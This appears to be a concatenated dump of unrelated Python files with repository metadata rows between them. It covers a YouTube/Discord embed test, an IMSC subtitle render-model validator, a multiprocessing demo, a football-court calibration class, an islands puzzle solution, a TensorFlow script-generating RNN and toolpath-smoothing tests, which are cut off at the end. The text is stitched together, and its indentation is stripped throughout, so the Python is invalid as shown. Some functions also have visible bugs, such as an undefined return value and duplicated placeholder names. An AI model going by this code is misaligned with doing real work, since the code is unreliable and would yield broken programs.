class TestVideoFunctions(unittest.TestCase):
def test_get_playlist_items(self):
r = main.get_playlist_items(TEST_PLAYLIST)
self.assertEqual(len(r['items']), 5)
def test_filter_items_by_timestamp(self):
r = main.get_playlist_items(TEST_PLAYLIST)
filtered = main.filter_playlist_items_by_timestamp(r, 1617985920)
self.assertEqual(len(filtered), 2)
# Not a test, but used in tests below.
def get_playlist_item_embed(pos: int):
r = main.get_playlist_items(TEST_PLAYLIST)
playlist_item = r['items'][pos]
epoch = main.iso_string_to_epoch(playlist_item
['snippet']['publishedAt'])
playlist_item['snippet']['publishedAt'] = epoch
embed = main.video_info_to_embed(playlist_item)
return embed
# Testing stuff with the Discord Embeds.
class TestEmbeds(unittest.TestCase):
def test_maxres_thumbnail(self):
embed = get_playlist_item_embed(1)
self.assertRegex(embed.thumbnail['url'], '(maxresdefault)')
def test_hq_thumbnail_when_no_maxres(self):
embed = get_playlist_item_embed(2)
self.assertRegex(embed.thumbnail['url'], '(hqdefault)')
if __name__ == '__main__':
unittest.main()
| 2.71875 | 3 |
src/main/python/imschrm/hrm.py | sandflow/imscHRM | 3 | 12796569 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2021, Pearl TV LLC
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Hypothetical Render Model (HRM)'''
__author__ = "<NAME> <<EMAIL>>"
import typing
from dataclasses import dataclass
from fractions import Fraction
from numbers import Number
import logging
import ttconv.isd
import ttconv.style_properties as styles
import ttconv.model
from ._gcpy_codepoints import GCPY_12
LOGGER = logging.getLogger(__name__)
_BDRAW = 12
_GCPY_BASE = 12
_GCPY_OTHER = 3
_REN_G_CJK = 0.6
_REN_G_OTHER = 1.2
_NGBS = 1
_IPD = 1
@dataclass
class ISDStatistics:
dur: Number = 0 # HRM ISD time
dur_d: Number = 0 # HRM background drawing time
nbg_total: Number = 0 # Number of backgrounds drawn
clear: bool = False # Whether the root container had to be cleared
dur_t: Number = 0 # HRM text drawing time
ngra_t: Number = 0 # Total Normalized Rendered Glyph Area
gcpy_count: Number = 0 # Total number of glyphs copied
gren_count: Number = 0 # Total number of glyphs rendered
is_empty: bool = False # Does the ISD contain any content
class EventHandler:
'''Allows a callee to inform the caller of events that occur during processing. Typically
overridden by the caller.
'''
@staticmethod
def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
return (
f"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\n"
f" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\n"
f" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\n"
)
def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()):
'''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM.
`isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose
active interval starts at `begin` seconds and ends immediately before the `begin` value of the next
ISD. Errors, warnings and info messages are signalled through callbacks on the `event_handler`.
'''
hrm = HRM()
last_offset = 0
is_last_isd_empty = True
for doc_index, (time_offset, isd) in enumerate(isd_iterator):
if time_offset < last_offset:
raise RuntimeError("ISDs are not in order of increasing offset")
stats = hrm.next_isd(isd, doc_index, is_last_isd_empty)
avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset
if stats.dur > avail_render_time:
event_handler.error("Rendering time exceeded", doc_index, time_offset, avail_render_time, stats)
if stats.ngra_t > 1:
event_handler.error("NGBS exceeded", doc_index, time_offset, avail_render_time, stats)
event_handler.debug("Processed document", doc_index, time_offset, avail_render_time, stats)
if not (stats.is_empty and is_last_isd_empty):
last_offset = time_offset
is_last_isd_empty = stats.is_empty
@dataclass(frozen=True)
class _Glyph:
char: str
color : styles.ColorType
font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]]
font_size: styles.LengthType
font_style: styles.FontStyleType
font_weight: styles.FontWeightType
text_decoration: styles.TextDecorationType
text_outline: styles.TextOutlineType
text_shadow: styles.TextShadowType
background_color: styles.ColorType
class HRM:
def __init__(self):
self.back_buffer: typing.Set[_Glyph] = set()
self.isd_stats: ISDStatistics = None
def next_isd(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
) -> ISDStatistics:
self.isd_stats = ISDStatistics()
self._compute_dur_t(isd, index_n)
self._compute_dur_d(isd, index_n, is_last_isd_empty)
self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d
return self.isd_stats
def _compute_dur_d(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
):
self.isd_stats.is_empty = True
draw_area = 0 if index_n == 0 or is_last_isd_empty else 1
self.isd_stats.clear = draw_area != 0
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
self.isd_stats.is_empty = False
nbg = 0
for element in region.dfs_iterator():
# should body elements really be excluded? -> NO
# should transparent backgrounds really be counted? -> NO
# should span and br really be included -> yes for now
# should br really be included -> no
if isinstance(element, ttconv.model.Br):
continue
bg_color = element.get_style(styles.StyleProperties.BackgroundColor)
if bg_color is not None:
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] != 0:
nbg += 1
draw_area += _region_normalized_size(region) * nbg
self.isd_stats.nbg_total += nbg
self.isd_stats.dur_d = draw_area / _BDRAW
def _compute_dur_t(
self,
isd: typing.Type[ttconv.isd.ISD],
_index_n: int
):
front_buffer = set()
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
for element in region.dfs_iterator():
if not isinstance(element, ttconv.model.Text):
continue
parent = element.parent()
nrga = _compute_nrga(element)
for char in element.get_text():
glyph = _Glyph(
char=char,
color=parent.get_style(styles.StyleProperties.Color),
font_family=parent.get_style(styles.StyleProperties.FontFamily),
font_size=parent.get_style(styles.StyleProperties.FontSize),
font_style=parent.get_style(styles.StyleProperties.FontStyle),
font_weight=parent.get_style(styles.StyleProperties.FontWeight),
text_decoration=parent.get_style(styles.StyleProperties.TextDecoration),
text_outline=parent.get_style(styles.StyleProperties.TextOutline),
text_shadow=parent.get_style(styles.StyleProperties.TextShadow),
background_color=parent.get_style(styles.StyleProperties.BackgroundColor)
)
if glyph in front_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.gcpy_count += 1
elif glyph in self.back_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gcpy_count += 1
else:
self.isd_stats.dur_t += nrga / _compute_ren_g(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gren_count += 1
front_buffer.add(glyph)
self.back_buffer = front_buffer
def _compute_nrga(element: typing.Type[ttconv.model.Text]):
font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize)
if font_size.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported fontSize units: {font_size.units}")
return font_size.value * font_size.value / 10000
def _compute_ren_g(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER
def _compute_gcpy(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER
def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]):
region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent)
if region_extent.width.units is not styles.LengthType.Units.rw:
raise RuntimeError(f"Unsupported extent width units: {region_extent.width.units}")
if region_extent.height.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported extent height units: {region_extent.height.units}")
return region_extent.width.value * region_extent.height.value / 10000
def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]):
'''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region
'''
if region.get_style(styles.StyleProperties.Opacity) == 0:
return False
if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none:
return False
if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none:
return False
if region.has_children():
return True
if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always:
return False
bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor)
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] == 0:
return False
return True
| 1.507813 | 2 |
month02/multiprocessing/day13-2/myprocess.py | chaofan-zheng/python_learning_code | 4 | 12796570 | <reponame>chaofan-zheng/python_learning_code<gh_stars>1-10
"""
自定义进程类
"""
from multiprocessing import Process
# 使用面向对象的思想 创建自己的进程类
class MyProcess(Process):
def __init__(self,value):
self.value = value
super().__init__() # 引入父类
def fun(self):
print(self.value)
# 进程执行内容的入口函数
def run(self):
self.fun()
print("搞点大事情,想干嘛都行")
my_process = MyProcess(3)
# 启动进程 进程执行内容从入口函数run引出
my_process.start()
my_process.join()
# class Process:
# def __init__(self,target):
# self._target = target
#
# def run(self):
# self._target()
#
# def start(self):
# # 创建进程
# self.run() | 3.96875 | 4 |
exe066a.py | Alexmachado81/ExerciciosPython_Resolvidos | 0 | 12796571 | soma = cont =0
while True:
numero = int(input('Informe um numero inteiro[digite 999 para ele parar ]:'))
if numero == 999:
break
soma = soma + numero
cont += 1
print(f' A soma dos {cont} numeros digitador é {soma}')
| 3.765625 | 4 |
examples/resources/football_court/court_image.py | ereide/pyga-camcal | 5 | 12796572 | <gh_stars>1-10
import os
import numpy as np
from interface.camera_calibration import ModelImage
dir_path = os.path.dirname(os.path.realpath(__file__))
class FootballManCityCourtImage2(ModelImage):
def __init__(self):
alpha = 13000
self.K = np.matrix([[alpha, 0.0, 800],
[0.0, alpha, 400],
[0.0, 0.0, 1.0]])
#Currently not used
self.distortion_coeff = None
self.lines = None
self.lines_img_ga = None
self.img_name = os.path.join(dir_path, "rgb_goal_line_MCity_2.png")
def set_lines(self):
goal_bot_left_corner = np.array([162 , 466, 1])
goal_bot_right_corner = np.array([932, 436, 1])
goal_top_left_corner = np.array([698 , 111, 1])
goal_top_right_corner = np.array([1442, 110, 1])
goal_left_back_corner = np.array([1, 141, 1])
goal_right_back_corner = np.array([721, 37, 1])
#keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1])
keeper_box_back_right = np.array([1421, 419, 1])
#keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1])
keeper_box_front_right = np.array([1592, 732, 1])
penalty_area_back_left = np.array([ 1, 465, 1])
penalty_area_back_right = np.array([1592, 408, 1])
#penalty_area_front_left =
#penalty_area_front_right =
back_line = (penalty_area_back_left, penalty_area_back_right)
goal_top_bar = (goal_top_left_corner, goal_top_right_corner)
goal_left_bar = (goal_bot_left_corner, goal_top_left_corner)
goal_right_bar = (goal_bot_right_corner, goal_top_right_corner)
goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner)
goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner)
#keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left)
keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right)
#keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right)
#penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left)
#penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right)
#penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right)
goal_lines = {"back_line": back_line,
"goal_top_bar": goal_top_bar,
"goal_left_bar" : goal_left_bar,
"goal_right_bar": goal_right_bar,
"goal_left_back_line": goal_left_back_line,
"goal_right_back_line": goal_right_back_line}
keeper_box_lines = {"keeper_box_right_line": keeper_box_right_line}
penalty_box_lines = {}
self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines}
return self.lines
| 2.203125 | 2 |
0845 Enclosed Islands.py | ansabgillani/binarysearchcomproblems | 1 | 12796573 | <filename>0845 Enclosed Islands.py
class Solution:
def solve(self, matrix):
total = sum(sum(row) for row in matrix)
escapable = 0
seen = set()
for r in range(len(matrix)):
for c in [0,len(matrix[0])-1]:
if (r,c) in seen or matrix[r][c] != 1:
continue
seen.add((r,c))
dfs = [[r,c]]
while dfs:
cr,cc = dfs.pop()
escapable += 1
for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]:
if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1:
dfs.append([nr,nc])
seen.add((nr,nc))
for r in [0,len(matrix)-1]:
for c in range(len(matrix[0])):
if (r,c) in seen or matrix[r][c] != 1:
continue
seen.add((r,c))
dfs = [[r,c]]
while dfs:
cr,cc = dfs.pop()
escapable += 1
for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]:
if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1:
dfs.append([nr,nc])
seen.add((nr,nc))
return total - escapable
| 2.9375 | 3 |
tv-script-generation/full_test/neural_network.py | AlphaGit/deep-learning | 0 | 12796574 | <filename>tv-script-generation/full_test/neural_network.py
import tensorflow as tf
import timeit
import datetime
import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
from tensorflow.contrib import seq2seq
class NeuralNetwork():
def get_inputs(self):
p_input = tf.placeholder(tf.int32, [None, None], name="input")
p_targets = tf.placeholder(tf.int32, [None, None], name="input")
p_learning_rate = tf.placeholder(tf.float32, name="learning_rate")
return (p_input, p_targets, p_learning_rate)
def get_init_cell(self, batch_size, rnn_size, layer_count=2):
basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)
multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count)
initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name="initial_state")
return (multi_rnn_cell, initial_state)
def get_embed(self, input_data, vocab_size, embed_dim):
embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1))
return tf.nn.embedding_lookup(embedding, input_data)
def build_rnn(self, cell, inputs):
outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)
final_state = tf.identity(final_state, name="final_state")
return (outputs, final_state)
def build_nn(self, cell, rnn_size, input_data, vocab_size):
embed_layer = self.get_embed(input_data, vocab_size, rnn_size)
rnn, final_state = self.build_rnn(cell, embed_layer)
fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None)
tf.summary.histogram('fully_connected', fully_connected)
return (fully_connected, final_state)
def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir):
self.train_graph = tf.Graph()
with self.train_graph.as_default():
vocab_size = len(int_to_vocab)
self.input_text, self.targets, self.lr = self.get_inputs()
input_data_shape = tf.shape(self.input_text)
cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count)
logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size)
# Probabilities for generating words
probs = tf.nn.softmax(logits, name='probs')
# Loss function
self.cost = seq2seq.sequence_loss(
logits,
self.targets,
tf.ones([input_data_shape[0], input_data_shape[1]]))
tf.summary.scalar('train_loss', self.cost)
# Optimizer
optimizer = tf.train.AdamOptimizer(self.lr)
# Gradient Clipping
gradients = optimizer.compute_gradients(self.cost)
capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients]
self.train_op = optimizer.apply_gradients(capped_gradients)
self.merged_summaries = tf.summary.merge_all()
self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph)
def run_train_epoch(self, sess, batches, learning_rate, epoch_i):
return train_loss
def save_trained_model(self, sess, save_dir, epoch_number):
saver = tf.train.Saver()
full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number)
if not os.path.exists(full_save_directory):
os.makedirs(full_save_directory)
saver.save(sess, full_save_directory)
print('Model trained and saved to {}.'.format(full_save_directory))
def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length):
print('Generating new text with prime word: {}'.format(prime_word))
test_final_state, test_probs = self.get_tensors(train_graph)
gen_sentences = [prime_word + ':']
prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])})
for n in range(gen_length):
# Dynamic Input
dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]]
dyn_seq_length = len(dyn_input[0])
# Get Prediction
probabilities, prev_state = sess.run(
[test_probs, test_final_state],
{self.input_text: dyn_input, initial_state: prev_state})
pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab)
gen_sentences.append(pred_word)
# Remove tokens
tv_script = ' '.join(gen_sentences)
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
tv_script = tv_script.replace(' ' + token.lower(), key)
tv_script = tv_script.replace('\n ', '\n')
tv_script = tv_script.replace('( ', '(')
return tv_script
def get_tensors(self, loaded_graph):
final_state_tensor = loaded_graph.get_tensor_by_name("final_state:0")
probabilities_tensor = loaded_graph.get_tensor_by_name("probs:0")
return (final_state_tensor, probabilities_tensor)
def pick_word(self, probabilities, int_to_vocab):
to_choose_from = list(int_to_vocab.values())
return np.random.choice(to_choose_from, p=probabilities)
def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length):
with tf.Session(graph=self.train_graph) as sess:
sess.run(tf.global_variables_initializer())
#print('Train graph:', train_graph.get_operations())
print('Running {} batches per epoch.'.format(len(batches)))
all_start_time = timeit.default_timer()
for epoch_i in range(num_epochs):
state = sess.run(self.initial_state, {self.input_text: batches[0][0]})
for batch_i, (x, y) in enumerate(batches):
feed = {
self.input_text: x,
self.targets: y,
self.initial_state: state,
self.lr: learning_rate}
train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed)
print('Ran batch {}', batch_i)
summary = sess.run(self.merged_summaries, feed)
self.train_writer.add_summary(summary, epoch_i)
last_end_time = timeit.default_timer()
total_seconds_so_far = last_end_time - all_start_time
total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far)
estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far)
print('Epoch {:>3}/{} train_loss = {:.3f}, time so far {}, estimated to finish {}'
.format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish))
if (epoch_i % save_every == 0 or epoch_i == num_epochs - 1):
self.save_trained_model(sess, save_dir, epoch_i + 1)
if (epoch_i % test_every == 0 or epoch_i == num_epochs - 1):
test_final_state, test_probs = self.get_tensors(self.train_graph)
tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length)
print("*********************************************************************************************")
print(tv_script)
print("*********************************************************************************************")
| 2.484375 | 2 |
vibration_compensation/tests/test_smoothed_toolpath.py | fredizzimo/VibrationCompensation | 0 | 12796575 | import os
from vibration_compensation import read_gcode, Data
import pytest
from numpy.testing import *
import numpy as np
import scipy as sp
import vibration_compensation.bokeh_imports as plt
@pytest.fixture(scope="module")
def figures():
path, filename = os.path.split(os.path.realpath(__file__))
path = os.path.join(path, "output")
os.makedirs(path, exist_ok=True)
plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + ".html"))
ret = []
yield ret
plt.save(ret)
def generate_curves(gcode, maximum_error):
data = read_gcode(gcode, maximum_error)
return data
@pytest.fixture(scope="function")
def plotter(figures, request):
def plot(data: Data):
p = plt.Figure(
plot_width=1000,
plot_height=1000,
x_range=(-250, 250),
y_range=(-250, 250),
match_aspect=True,
lod_threshold=None,
title=request.node.name
)
p.segment(
x0=data.start_xy[:, 0],
x1=data.end_xy[:, 0],
y0=data.start_xy[:, 1],
y1=data.end_xy[:, 1],
line_width=1,
line_color="red",
line_dash="dotted"
)
ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1)
points = data.smoothed_toolpath(ts)
p.line(
points[:,0],
points[:,1],
line_width=2,
line_color="blue",
line_dash="solid"
)
p.circle(
points[:,0],
points[:,1],
size=4,
fill_color="white"
)
figures.append(p)
return plot
def point_on_line(linea, lineb, point):
return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\
- np.linalg.norm(linea - lineb)
def point_on_middle_of_line(linea, lineb, point):
mid = (lineb - linea) * 0.5 + linea
return np.linalg.norm(point - mid)
class SegmentChecker(object):
def __init__(self,data, l, s, start, end, corner):
self.data = data
self.s = s
self.start = start
self.end = end
self.start_point = data.start_xy[l]
self.end_point = data.end_xy[l]
if l != data.start_xy.shape[0] - 1:
self.next_start_point = data.start_xy[l+1]
self.next_end_point = data.end_xy[l+1]
self.spline = data.smoothed_toolpath
if corner:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_mid = l + 1.0
self.spline_end = data.smoothed_toolpath.segment_end[s]
else:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_end = data.smoothed_toolpath.segment_end[s]
self.spline_mid = (self.spline_start + self.spline_end) / 2.0
xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1)
self.start_line_dist = np.sum(xy_lengths[:l])
self.line_length = xy_lengths[l]
if l < data.start_xy.shape[0] - 1:
self.start_next_line_dist = self.start_line_dist + self.line_length
self.next_line_length = xy_lengths[l+1]
def check_distance(self, spline, line):
msg = "The spline start distance does not match"
if line <= 1.0:
line_dist = self.start_line_dist + self.line_length * line
else:
line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0)
assert self.spline.distance(spline) <= line_dist and \
self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \
msg
def check_start_point_start(self):
msg = "The start point of the spline segment does not match the line start point"
assert_array_almost_equal(self.spline(self.spline_start), self.start_point,
err_msg=msg)
self.check_distance(self.spline_start, 0)
def check_start_point_on(self):
msg = "The start point of the spline segment is not on the line"
assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \
pytest.approx(0, abs=1e-12), msg
def check_line_start_point_middle(self):
msg = "The start point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg
self.check_distance(self.spline_start, 0.5)
def check_line_start_point_end(self):
msg = "The start point of the spline segment is not on the end of the line"
assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg)
self.check_distance(self.spline_start, 1.0)
def check_point_on_middle_of_line(self):
msg = "The middle point of the spline segment is not on the middle of the line"
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
self.check_distance(self.spline_mid, 0.5)
def check_point_on_line(self):
msg = "The middle point of the spline segment is not on the line"
assert point_on_line(self.start_point, self.end_point,
self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg
def check_end_point_end(self):
msg = "The end point of the spline segment does not match the line end point"
assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg
self.check_distance(self.spline_end, 1.0)
end_error_segment = "The end point of the spline segment is not on the line"
def check_end_point_on(self):
assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \
pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment
def check_corner_end_point_on(self):
assert point_on_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\
SegmentChecker.end_error_segment
end_error_segment_middle = "The end point of the spline segment is not on the middle of the line"
def check_end_point_middle(self):
assert point_on_middle_of_line(self.start_point, self.end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 0.5)
def check_corner_end_point_middle(self):
assert point_on_middle_of_line(self.next_start_point, self.next_end_point,
self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\
SegmentChecker.end_error_segment_middle
self.check_distance(self.spline_end, 1.5)
def check_continuity(self):
msg = "There's a discontinuity at the end of the spline segment"
if self.s > 0:
prev_end = self.data.smoothed_toolpath.segment_end[self.s-1]
assert prev_end == self.spline_start, \
"The previous segment does not end where the current one starts"
assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start),
err_msg=msg)
assert self.spline.distance(self.spline_start-1e-12) <=\
self.spline.distance(self.spline_start) and \
self.spline.distance(self.spline_start-1e-12) == \
pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \
"The previous segment end distance and the current segment start do not match up"
def check_corner_spline_order(self):
assert self.spline_end > self.spline_mid, \
"The endpoint of the corner spline is before the line segment end"
corner_error = "The closest point of the corner is not close enough"
def check_corner_middle_normal(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def check_corner_middle_short(self):
assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\
pytest.approx(0.01, abs=1e-12), \
SegmentChecker.corner_error
self.check_distance(self.spline_mid, 1.0)
def straight_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, False)
if start == "start":
checker.check_start_point_start()
elif start == "on":
checker.check_start_point_on()
elif start == "middle":
checker.check_line_start_point_middle()
elif start == "end":
checker.check_line_start_point_end()
else:
assert False, "Invalid start type"
if start == "start" and end == "end":
checker.check_point_on_middle_of_line()
else:
checker.check_point_on_line()
if end == "end":
checker.check_end_point_end()
elif end == "on":
checker.check_end_point_on()
elif end == "middle":
checker.check_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def corner_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, True)
checker.check_corner_spline_order()
if start == "on":
checker.check_start_point_on()
elif start == "middle":
checker.check_line_start_point_middle()
else:
assert False, "Invalid start type"
if start == "middle" or end == "middle":
checker.check_corner_middle_normal()
else:
checker.check_corner_middle_short()
if end == "on":
checker.check_corner_end_point_on()
elif end == "middle":
checker.check_corner_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def check_distances(data):
t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10)
assert_array_almost_equal(data.smoothed_toolpath.distance(t),
np.linspace(0, data.smoothed_toolpath.total_distance(), 10))
def test_straight_line(plotter):
data = generate_curves([
"G1 X100 Y200"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 1
straight_segment(data, l=0, s=0, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) ==\
pytest.approx(np.linalg.norm([100, 200]))
check_distances(data)
plotter(data)
def test_two_straight_lines(plotter):
data = generate_curves([
"G1 X50 Y50",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 2
straight_segment(data, l=0, s=0, start="start", end="end")
straight_segment(data, l=1, s=1, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(
np.linalg.norm([50, 50]) + np.linalg.norm([50, 50])
)
check_distances(data)
plotter(data)
def test_90_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0
assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1)
